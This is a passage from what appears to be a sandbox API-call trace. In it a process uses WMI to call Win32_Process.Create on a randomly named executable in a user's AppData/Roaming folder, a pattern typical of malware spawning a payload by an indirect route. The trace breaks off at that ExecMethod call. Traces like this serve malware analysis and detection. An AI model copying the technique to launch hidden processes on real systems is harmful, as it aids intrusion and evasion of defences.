Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x2421460 | out: ppv=0x2421460*=0x24214e0) returned 0x0 [0099.413] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421500 [0099.413] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421590 [0099.413] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421630 [0099.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.413] GetCurrentThreadId () returned 0x274 [0099.414] _wcsnicmp (_String1="W", _String2="[", _MaxCount=0x1) returned 28 [0099.414] _wcsnicmp (_String1="W", _String2="!", _MaxCount=0x1) returned 86 [0099.414] CoCreateInstance (in: rclsid=0x7fef7ad1698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef7ad1688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x23bc08 | out: ppv=0x23bc08*=0x2421670) returned 0x0 [0099.418] CoCreateInstance (in: rclsid=0x7fef7ad1698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef7ad1688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x23bb28 | out: ppv=0x23bb28*=0x2421770) returned 0x0 [0099.418] WbemDefPath:IWbemPath:SetText (This=0x2421770, uMode=0x4, pszPath="Win32_Process") returned 0x0 [0099.418] WbemDefPath:IUnknown:Release (This=0x2421770) returned 0x0 [0099.418] SysStringLen (param_1="Win32_Process") returned 0xd [0099.418] WbemDefPath:IWbemPath:SetText (This=0x2421670, uMode=0x4, pszPath="Win32_Process") returned 0x0 [0099.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2421670, puCount=0x23bb68 | out: puCount=0x23bb68*=0x0) returned 0x0 [0099.418] WbemDefPath:IWbemPath:GetServer (in: This=0x2421670, puNameBufLength=0x23bb50*=0x0, pName=0x0 | out: puNameBufLength=0x23bb50*=0x2, pName=0x0) returned 0x0 [0099.418] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24217a0 [0099.418] WbemDefPath:IWbemPath:GetServer (in: This=0x2421670, puNameBufLength=0x23bb50*=0x2, pName="ᢐɂ" | out: puNameBufLength=0x23bb50*=0x2, pName=".") returned 0x0 [0099.418] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.418] GetCurrentThreadId () returned 0x274 [0099.418] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x23ba38 | out: phkResult=0x23ba38*=0x14c) returned 0x0 [0099.418] RegQueryValueExW (in: hKey=0x14c, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x23ba30*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x23ba30*=0x16) returned 0x0 [0099.419] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24217a0 [0099.419] RegQueryValueExW (in: hKey=0x14c, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x24217a0, lpcbData=0x23ba30*=0x16 | out: lpType=0x0, lpData=0x24217a0*=0x72, lpcbData=0x23ba30*=0x16) returned 0x0 [0099.419] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24217c0 [0099.419] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.419] RegCloseKey (hKey=0x14c) returned 0x0 [0099.419] CoCreateInstance (in: rclsid=0x7fef7ad1698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef7ad1688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x23ba70 | out: ppv=0x23ba70*=0x2421890) returned 0x0 [0099.419] SysStringLen (param_1=".") returned 0x1 [0099.419] WbemDefPath:IWbemPath:SetServer (This=0x2421890, Name=".") returned 0x0 [0099.419] CoCreateInstance (in: rclsid=0x7fef7ad1698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef7ad1688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x23b9f0 | out: ppv=0x23b9f0*=0x2421990) returned 0x0 [0099.419] CoCreateInstance (in: rclsid=0x7fef7ad1698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef7ad1688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x23b9d8 | out: ppv=0x23b9d8*=0x2421a90) returned 0x0 [0099.419] WbemDefPath:IWbemPath:SetText (This=0x2421a90, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0099.419] WbemDefPath:IUnknown:Release (This=0x2421a90) returned 0x0 [0099.419] SysStringLen (param_1="root\\cimv2") returned 0xa [0099.419] WbemDefPath:IWbemPath:SetText (This=0x2421990, uMode=0xc, pszPath="root\\cimv2") returned 0x0 [0099.419] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2421990, puCount=0x23ba30 | out: puCount=0x23ba30*=0x2) returned 0x0 [0099.419] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x2421890) returned 0x0 [0099.419] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2421990, uIndex=0x0, puNameBufLength=0x23b9c0*=0x0, pName=0x0 | out: puNameBufLength=0x23b9c0*=0x5, pName=0x0) returned 0x0 [0099.419] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421a90 [0099.419] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2421990, uIndex=0x0, puNameBufLength=0x23b9c0*=0x5, pName="ᲀɂ" | out: puNameBufLength=0x23b9c0*=0x5, pName="root") returned 0x0 [0099.419] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.419] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x2421890, uIndex=0x0, pszName="root") returned 0x0 [0099.419] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2421990, uIndex=0x1, puNameBufLength=0x23b9c0*=0x0, pName=0x0 | out: puNameBufLength=0x23b9c0*=0x6, pName=0x0) returned 0x0 [0099.419] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421d30 [0099.419] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2421990, uIndex=0x1, puNameBufLength=0x23b9c0*=0x6, pName="Řɂ" | out: puNameBufLength=0x23b9c0*=0x6, pName="cimv2") returned 0x0 [0099.419] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.420] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x2421890, uIndex=0x1, pszName="cimv2") returned 0x0 [0099.420] WbemDefPath:IUnknown:Release (This=0x2421990) returned 0x0 [0099.420] WbemDefPath:IWbemPath:GetText (in: This=0x2421890, lFlags=4, puBuffLength=0x23ba30*=0x0, pszText=0x0 | out: puBuffLength=0x23ba30*=0xf, pszText=0x0) returned 0x0 [0099.420] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421990 [0099.420] WbemDefPath:IWbemPath:GetText (in: This=0x2421890, lFlags=4, puBuffLength=0x23ba30*=0xf, pszText="ᫀɂ" | out: puBuffLength=0x23ba30*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0099.420] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.420] WbemDefPath:IUnknown:Release (This=0x2421890) returned 0x0 [0099.420] WbemLocator:IWbemLocator:ConnectServer (in: This=0x24214e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x23bb00 | out: ppNamespace=0x23bb00*=0x2433738) returned 0x0 [0099.447] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2433750 [0099.447] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2433800 [0099.447] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24338a0 [0099.447] WbemLocator:IUnknown:QueryInterface (in: This=0x2433738, riid=0x7fef7ad1628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23b8c8 | out: ppvObject=0x23b8c8*=0x488440) returned 0x0 [0099.447] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x488440, pProxy=0x2433738, pAuthnSvc=0x23b8c0, pAuthzSvc=0x23b908, pServerPrincName=0x0, pAuthnLevel=0x23b958, pImpLevel=0x23b910, pAuthInfo=0x0, pCapabilites=0x23b8f8 | out: pAuthnSvc=0x23b8c0*=0xa, pAuthzSvc=0x23b908*=0x0, pServerPrincName=0x0, pAuthnLevel=0x23b958*=0x6, pImpLevel=0x23b910*=0x2, pAuthInfo=0x0, pCapabilites=0x23b8f8*=0x1) returned 0x0 [0099.447] WbemLocator:IUnknown:Release (This=0x488440) returned 0x1 [0099.448] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.448] GetCurrentThreadId () returned 0x274 [0099.448] WbemLocator:IUnknown:QueryInterface (in: This=0x2433738, riid=0x7fef7ad1628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23b920 | out: ppvObject=0x23b920*=0x488440) returned 0x0 [0099.448] WbemLocator:IClientSecurity:CopyProxy (in: This=0x488440, pProxy=0x2433738, ppCopy=0x23b918 | out: ppCopy=0x23b918*=0x2433ad8) returned 0x0 [0099.448] WbemLocator:IUnknown:QueryInterface (in: This=0x2433ad8, riid=0x7fef7ad1628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23b7d0 | out: ppvObject=0x23b7d0*=0x488440) returned 0x0 [0099.448] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x488440, pProxy=0x2433ad8, pAuthnSvc=0x23b870, pAuthzSvc=0x23b820, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x23b870*=0xa, pAuthzSvc=0x23b820*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0099.448] WbemLocator:IUnknown:Release (This=0x488440) returned 0x3 [0099.448] WbemLocator:IUnknown:QueryInterface (in: This=0x2433ad8, riid=0x7fef7ad1568*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23b790 | out: ppvObject=0x23b790*=0x488480) returned 0x0 [0099.448] WbemLocator:IUnknown:QueryInterface (in: This=0x2433ad8, riid=0x7fef7ad1628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23b7d0 | out: ppvObject=0x23b7d0*=0x488440) returned 0x0 [0099.448] WbemLocator:IClientSecurity:SetBlanket (This=0x488440, pProxy=0x2433ad8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0099.448] WbemLocator:IUnknown:Release (This=0x488440) returned 0x4 [0099.448] WbemLocator:IUnknown:Release (This=0x488480) returned 0x3 [0099.448] WbemLocator:IUnknown:Release (This=0x488440) returned 0x2 [0099.448] WbemLocator:IUnknown:AddRef (This=0x2433ad8) returned 0x3 [0099.448] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2433af0 [0099.449] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24315d0 [0099.449] WbemLocator:IUnknown:Release (This=0x2433738) returned 0x2 [0099.449] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.449] GetCurrentThreadId () returned 0x274 [0099.449] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.449] GetCurrentThreadId () returned 0x274 [0099.449] WbemLocator:IUnknown:QueryInterface (in: This=0x2433ad8, riid=0x7fef7ad1628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23bab8 | out: ppvObject=0x23bab8*=0x488440) returned 0x0 [0099.449] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x488440, pProxy=0x2433ad8, pAuthnSvc=0x23bab0, pAuthzSvc=0x23baf8, pServerPrincName=0x0, pAuthnLevel=0x23bb20, pImpLevel=0x23bb18, pAuthInfo=0x0, pCapabilites=0x23bae8 | out: pAuthnSvc=0x23bab0*=0xa, pAuthzSvc=0x23baf8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x23bb20*=0x6, pImpLevel=0x23bb18*=0x3, pAuthInfo=0x0, pCapabilites=0x23bae8*=0x20) returned 0x0 [0099.449] WbemLocator:IUnknown:Release (This=0x488440) returned 0x2 [0099.449] WbemDefPath:IWbemPath:GetInfo (in: This=0x2421670, uRequestedInfo=0x0, puResponse=0x23bb20 | out: puResponse=0x23bb20*=0xc15) returned 0x0 [0099.449] WbemDefPath:IWbemPath:GetText (in: This=0x2421670, lFlags=2, puBuffLength=0x23bb50*=0x0, pszText=0x0 | out: puBuffLength=0x23bb50*=0xe, pszText=0x0) returned 0x0 [0099.449] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421890 [0099.449] WbemDefPath:IWbemPath:GetText (in: This=0x2421670, lFlags=2, puBuffLength=0x23bb50*=0xe, pszText="㮐Ƀ" | out: puBuffLength=0x23bb50*=0xe, pszText="Win32_Process") returned 0x0 [0099.450] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.450] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.450] GetCurrentThreadId () returned 0x274 [0099.450] WbemLocator:IUnknown:AddRef (This=0x2433ad8) returned 0x3 [0099.450] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.450] GetCurrentThreadId () returned 0x274 [0099.450] IWbemServices:GetObject (in: This=0x2433ad8, strObjectPath="Win32_Process", lFlags=0, pCtx=0x0, ppObject=0x23bb18*=0x0, ppCallResult=0x0 | out: ppObject=0x23bb18*=0x2438c00, ppCallResult=0x0) returned 0x0 [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2438f70 [0099.475] IUnknown:AddRef (This=0x2438c00) returned 0x2 [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2438ff0 [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24390a0 [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2439140 [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24391e0 [0099.475] WbemLocator:IUnknown:AddRef (This=0x2433ad8) returned 0x4 [0099.475] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2432240 [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2439220 [0099.475] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2439260 [0099.475] IUnknown:AddRef (This=0x2438c00) returned 0x3 [0099.475] IUnknown:Release (This=0x2438c00) returned 0x2 [0099.475] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x23ba70 | out: pperrinfo=0x23ba70*=0x0) returned 0x1 [0099.476] WbemLocator:IUnknown:Release (This=0x2433ad8) returned 0x3 [0099.476] CreatePointerMoniker (in: punk=0x2438f70, ppmk=0x23bdc0 | out: ppmk=0x23bdc0*=0x48bdd0) returned 0x0 [0099.476] IUnknown:AddRef (This=0x2438f70) returned 0x2 [0099.476] WbemLocator:IUnknown:Release (This=0x2433ad8) returned 0x2 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] WbemDefPath:IUnknown:Release (This=0x2421670) returned 0x0 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] WbemLocator:IUnknown:Release (This=0x24214e0) returned 0x0 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.476] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.477] WinMGMTS:IUnknown:Release (This=0x24213d0) returned 0x0 [0099.477] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.477] IUnknown:Release (This=0x472400) returned 0x0 [0099.477] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="BindMoniker") returned 0x7fefe2b9950 [0099.477] BindMoniker (in: pmk=0x48bdd0, grfOpt=0x0, iidResult=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x23be48 | out: ppvResult=0x23be48*=0x2438f70) returned 0x0 [0099.477] IUnknown:QueryInterface (in: This=0x2438f70, riid=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23be48 | out: ppvObject=0x23be48*=0x2438f70) returned 0x0 [0099.477] IUnknown:Release (This=0x48bdd0) returned 0x0 [0099.477] IUnknown:Release (This=0x2438f70) returned 0x1 [0099.477] LoadRegTypeLib (in: rguid=0x7fef7ad17a8*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x23c040*=0x0 | out: pptlib=0x23c040*=0x491fc0) returned 0x0 [0099.546] ITypeLib:GetTypeInfoType (in: This=0x491fc0, index=0xf7ad1908, pTKind=0x2432270 | out: pTKind=0x2432270*=4795560) returned 0x0 [0099.546] IUnknown:Release (This=0x491fc0) returned 0x1 [0099.546] DispGetIDsOfNames (in: ptinfo=0x492ca8, rgszNames=0x23c0e0*="Create", cNames=0x1, rgdispid=0x23c1c8 | out: rgdispid=0x23c1c8*=-1) returned 0x80020006 [0099.553] IUnknown:AddRef (This=0x2438c00) returned 0x3 [0099.553] IWbemClassObject:Get (in: This=0x2438c00, wszName="Create", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0x23c070*=0 | out: pVal=0x0, pType=0x0, plFlavor=0x23c070*=0) returned 0x80041002 [0099.553] IUnknown:Release (This=0x2438c00) returned 0x2 [0099.554] IWbemClassObject:Get (in: This=0x2438c00, wszName="__GENUS", lFlags=0, pVal=0x23beb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x23beb0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0099.554] IUnknown:AddRef (This=0x2438c00) returned 0x3 [0099.554] IUnknown:AddRef (This=0x2438c00) returned 0x4 [0099.554] IWbemClassObject:GetMethod (in: This=0x2438c00, wszName="Create", lFlags=0, ppInSignature=0x23bfa0, ppOutSignature=0x23bfa8 | out: ppInSignature=0x23bfa0*=0x24213d0, ppOutSignature=0x23bfa8*=0x2439dc0) returned 0x0 [0099.554] IWbemClassObject:GetNames (in: This=0x24213d0, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0x23bfb8 | out: pNames=0x23bfb8*="\x01ƀ\x08") returned 0x0 [0099.554] IWbemClassObject:GetNames (in: This=0x2439dc0, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0x23bfb0 | out: pNames=0x23bfb0*="\x01ƀ\x08") returned 0x0 [0099.554] IUnknown:Release (This=0x2438c00) returned 0x3 [0099.554] SysStringLen (param_1="Create") returned 0x6 [0099.554] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24315d0 [0099.554] SysStringLen (param_1="Create") returned 0x6 [0099.555] IUnknown:Release (This=0x2439dc0) returned 0x0 [0099.555] IUnknown:Release (This=0x24213d0) returned 0x0 [0099.555] IUnknown:Release (This=0x492ca8) returned 0x1 [0099.555] ??2@YAPEAX_K@Z () returned 0x40a030 [0099.555] IUnknown:AddRef (This=0x492ca8) returned 0x2 [0099.555] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.555] GetCurrentThreadId () returned 0x274 [0099.555] SysStringLen (param_1="Create") returned 0x6 [0099.555] IWbemClassObject:GetMethod (in: This=0x2438c00, wszName="Create", lFlags=0, ppInSignature=0x23bf88, ppOutSignature=0x23bf90 | out: ppInSignature=0x23bf88*=0x24213d0, ppOutSignature=0x23bf90*=0x2439dc0) returned 0x0 [0099.556] IWbemClassObject:SpawnInstance (in: This=0x24213d0, lFlags=0, ppNewInstance=0x23bf98 | out: ppNewInstance=0x23bf98*=0x243a130) returned 0x0 [0099.556] IWbemClassObject:BeginEnumeration (This=0x24213d0, lEnumFlags=64) returned 0x0 [0099.556] IWbemClassObject:Next (in: This=0x24213d0, lFlags=0, strName=0x23bf58*=0x0, pVal=0x0, pType=0x23bf50*=37982072, plFlavor=0x0 | out: strName=0x23bf58*="CommandLine", pVal=0x0, pType=0x23bf50*=8, plFlavor=0x0) returned 0x0 [0099.556] IWbemClassObject:GetPropertyQualifierSet (in: This=0x24213d0, wszProperty="CommandLine", ppQualSet=0x23bed0 | out: ppQualSet=0x23bed0*=0x2421740) returned 0x0 [0099.556] IWbemQualifierSet:Get (in: This=0x2421740, wszName="id", lFlags=0, pVal=0x23bef0*(varType=0x0, wReserved1=0x23, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fef7ae9bd4, varVal2=0x23bf48), plFlavor=0x0 | out: pVal=0x23bef0*(varType=0x3, wReserved1=0x23, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000000, varVal2=0x23bf48), plFlavor=0x0) returned 0x0 [0099.556] IWbemClassObject:Put (This=0x243a130, wszName="CommandLine", lFlags=0, pVal=0x23bed8*(varType=0x8, wReserved1=0xf6b0, wReserved2=0x7fe, wReserved3=0x0, varVal1="C:/Users/5p5NrGJn0jS HALPmcxz/AppData/Roaming/gtjtdfe", varVal2=0x23bf88), Type=0) returned 0x0 [0099.557] IUnknown:Release (This=0x2421740) returned 0x0 [0099.557] IWbemClassObject:Next (in: This=0x24213d0, lFlags=0, strName=0x23bf58*=0x0, pVal=0x0, pType=0x23bf50*=8, plFlavor=0x0 | out: strName=0x23bf58*="CurrentDirectory", pVal=0x0, pType=0x23bf50*=8, plFlavor=0x0) returned 0x0 [0099.557] IWbemClassObject:GetPropertyQualifierSet (in: This=0x24213d0, wszProperty="CurrentDirectory", ppQualSet=0x23bed0 | out: ppQualSet=0x23bed0*=0x2421740) returned 0x0 [0099.557] IWbemQualifierSet:Get (in: This=0x2421740, wszName="id", lFlags=0, pVal=0x23bef0*(varType=0x0, wReserved1=0x23, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000000, varVal2=0x23bf48), plFlavor=0x0 | out: pVal=0x23bef0*(varType=0x3, wReserved1=0x23, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x23bf48), plFlavor=0x0) returned 0x0 [0099.557] IWbemClassObject:Put (This=0x243a130, wszName="CurrentDirectory", lFlags=0, pVal=0x23bed8*(varType=0x1, wReserved1=0xf6b0, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x47d0a8, varVal2=0x23bf88), Type=0) returned 0x0 [0099.557] IUnknown:Release (This=0x2421740) returned 0x0 [0099.557] IWbemClassObject:Next (in: This=0x24213d0, lFlags=0, strName=0x23bf58*=0x0, pVal=0x0, pType=0x23bf50*=8, plFlavor=0x0 | out: strName=0x23bf58*="ProcessStartupInformation", pVal=0x0, pType=0x23bf50*=13, plFlavor=0x0) returned 0x0 [0099.557] IWbemClassObject:GetPropertyQualifierSet (in: This=0x24213d0, wszProperty="ProcessStartupInformation", ppQualSet=0x23bed0 | out: ppQualSet=0x23bed0*=0x2421740) returned 0x0 [0099.557] IWbemQualifierSet:Get (in: This=0x2421740, wszName="id", lFlags=0, pVal=0x23bef0*(varType=0x0, wReserved1=0x23, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x23bf48), plFlavor=0x0 | out: pVal=0x23bef0*(varType=0x3, wReserved1=0x23, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0x23bf48), plFlavor=0x0) returned 0x0 [0099.557] IWbemClassObject:Put (This=0x243a130, wszName="ProcessStartupInformation", lFlags=0, pVal=0x23bed8*(varType=0x1, wReserved1=0xf6b0, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x47d0a8, varVal2=0x23bf88), Type=0) returned 0x0 [0099.557] IUnknown:Release (This=0x2421740) returned 0x0 [0099.557] IWbemClassObject:Next (in: This=0x24213d0, lFlags=0, strName=0x23bf58*=0x0, pVal=0x0, pType=0x23bf50*=13, plFlavor=0x0 | out: strName=0x23bf58*=0x0, pVal=0x0, pType=0x23bf50*=13, plFlavor=0x0) returned 0x40005 [0099.557] WbemLocator:IUnknown:AddRef (This=0x2433ad8) returned 0x3 [0099.558] IWbemClassObject:Get (in: This=0x2438c00, wszName="__RELPATH", lFlags=0, pVal=0x23bfb8*(varType=0x0, wReserved1=0xf7ae, wReserved2=0x7fe, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x7fef7ad3770), pType=0x0, plFlavor=0x0 | out: pVal=0x23bfb8*(varType=0x8, wReserved1=0xf7ae, wReserved2=0x7fe, wReserved3=0x0, varVal1="Win32_Process", varVal2=0x7fef7ad3770), pType=0x0, plFlavor=0x0) returned 0x0 [0099.558] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0099.558] GetCurrentThreadId () returned 0x274 [0099.558] IWbemServices:ExecMethod (in: This=0x2433ad8, strObjectPath="Win32_Process", strMethodName="Create", 